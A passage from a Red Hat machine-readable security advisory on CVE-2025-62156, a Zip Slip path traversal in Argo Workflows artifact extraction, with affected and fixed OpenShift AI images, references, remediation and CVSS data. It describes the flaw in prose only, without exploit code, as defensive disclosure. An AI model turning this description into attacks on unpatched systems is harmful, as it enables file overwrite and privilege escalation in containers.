"text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions prior to 3.6.12 and versions 3.7.0 through 3.7.2 contain a Zip Slip path traversal vulnerability in artifact extraction. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container. Update to 3.6.12 or 3.7.3 to remediate the issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-workflows: Argo Workflows Zip Slip",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-62156"
},
{
"category": "external",
"summary": "RHBZ#2403800",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2403800"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-62156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62156"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993",
"url": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011",
"url": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3",
"url": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf",
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf"
}
],
"release_date": "2025-10-14T14:52:44.502000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/argoproj/argo-workflows: Argo Workflows Zip Slip"
},
{
"cve": "CVE-2025-62727",
"cwe": {
"id": "CWE-407",
"name": "Inefficient Algorithmic Complexity"
},
"discovery_date": "2025-10-28T21:01:03.833849+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
